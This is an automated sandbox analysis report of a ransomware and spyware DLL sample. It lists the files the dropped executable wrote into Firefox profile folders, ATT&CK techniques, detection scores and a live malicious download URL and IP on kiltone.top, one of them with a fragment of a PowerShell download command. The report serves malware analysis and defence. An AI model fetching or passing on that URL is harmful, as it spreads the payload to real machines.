Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal.bKmk
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966540.1912e5a9-a49a-44a5-95c6-6e047a7410c8.new-profile.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966546.1036486f-a56a-437b-b1e7-a2f1fa5fb914.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971707.a2d29e6c-ac08-481c-a5a2-3b45379df53a.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966547.008ede48-c825-4f89-a2a2-325df2c42c07.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.1d0a55ec-8147-406f-a800-14c2abac24f9.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.b5870d07-97bf-4bf9-a21f-d4715e2d8984.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\background-update
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\events
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\036d0311-0554-4100-9fa8-d932e8d08b3a
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1864fd66-67cd-4e70-8503-03455dd087ef
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\1eec0575-b4e6-4e3a-8120-1c64a549cf4d
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3026813b-3a35-4f80-9cae-dbfc31ca1561
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\36538aaa-6959-4075-90b3-e0189a8af344
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3c7a728e-a155-4cc6-a293-522ff9409223
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\5fde80e9-4710-4773-9d91-3de50eb3a611
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\612c12d3-948f-48f6-91fb-d0d8ccda0670
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\68582a3e-63c9-4674-9a87-c796e9492d98
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\8e0ea440-692c-4546-bda1-eee741f68cac
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\bc3a7ef5-b3fe-4d70-bd89-e3ab232ffcdb
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\cda89272-a9f9-47ec-8bfb-229c7c5839c5
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\e55a0594-28e6-48b8-887a-84c346ad1268
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-wal.dUWq
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\parent.lock.lbOM
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal.haLZ
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1036486f-a56a-437b-b1e7-a2f1fa5fb914
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1912e5a9-a49a-44a5-95c6-6e047a7410c8
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1d0a55ec-8147-406f-a800-14c2abac24f9
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\975fa64d-84a3-45a6-931b-6d9e916c1153
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\a2d29e6c-ac08-481c-a5a2-3b45379df53a
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\search.json.mozlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\d1a7a52e-e3c7-4e69-93b1-055dbe542ec9
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionCheckpoints.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\SiteSecurityServiceState.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\.metadata-v2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.MSIkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.EHaOJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.jFCZJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.UnTEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.fYknJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.MLloJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite-wal.BQdXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\xulstore.json.QawrJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact |
| Credentials | Domains | Default Accounts | 1 Native API | 21 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 4 File and Directory Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 11 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 32 System Information Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 241 Security Software Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
[Behavior graph: ID 1575339, Sample: TD2HjoogPx.dll, Startdate: 15/12/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| TD2HjoogPx.dll | 44% | Virustotal | | Browse |
| TD2HjoogPx.dll | 37% | ReversingLabs | Win32.Trojan.Doina | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Temp\eryy65ty.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\eryy65ty.exe | 45% | ReversingLabs | Win32.Trojan.Nekark | |
| C:\Users\user\AppData\Local\Temp\eryy65ty.exe | 67% | Virustotal | | Browse |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| kiltone.top | 4% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp | 0% | Avira URL Cloud | safe | |
| https://kiltone.top/stelin/Gosjeufon.cpl | 100% | Avira URL Cloud | malware | |
| https://kiltone.top/stelin/Gosjeufon.cpl | 11% | Virustotal | | Browse |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| kiltone.top | 45.125.67.168 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://kiltone.top/stelin/Gosjeufon.cpl | true | 11%, Virustotal, Browse; Avira URL Cloud: malware | unknown |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- | --- |
| 45.125.67.168 | kiltone.top | Hong Kong | | 133398 | TELE-ASTeleAsiaLimitedHK | true |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575339
Start date and time: 2024-12-15 09:26:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 53
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TD2HjoogPx.dll
renamed because original name is a hash value
Original Sample Name: fccd129f6a5b9d2133d14922a3614f02.dll
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.evad.winDLL@62/710@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 58
• Number of non-executed functions: 170
Cookbook Comments:
• Found application associated with file extension: .dll
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
| --- | --- | --- |
| 03:27:28 | API Interceptor | 109x Sleep call for process: powershell.exe modified |
| 03:27:36 | API Interceptor | 1x Sleep call for process: rundll32.exe modified |
| 03:27:37 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified |
| 03:27:43 | API Interceptor | 5x Sleep call for process: WMIC.exe modified |
| 03:28:19 | API Interceptor | 5x Sleep call for process: eryy65ty.exe modified |
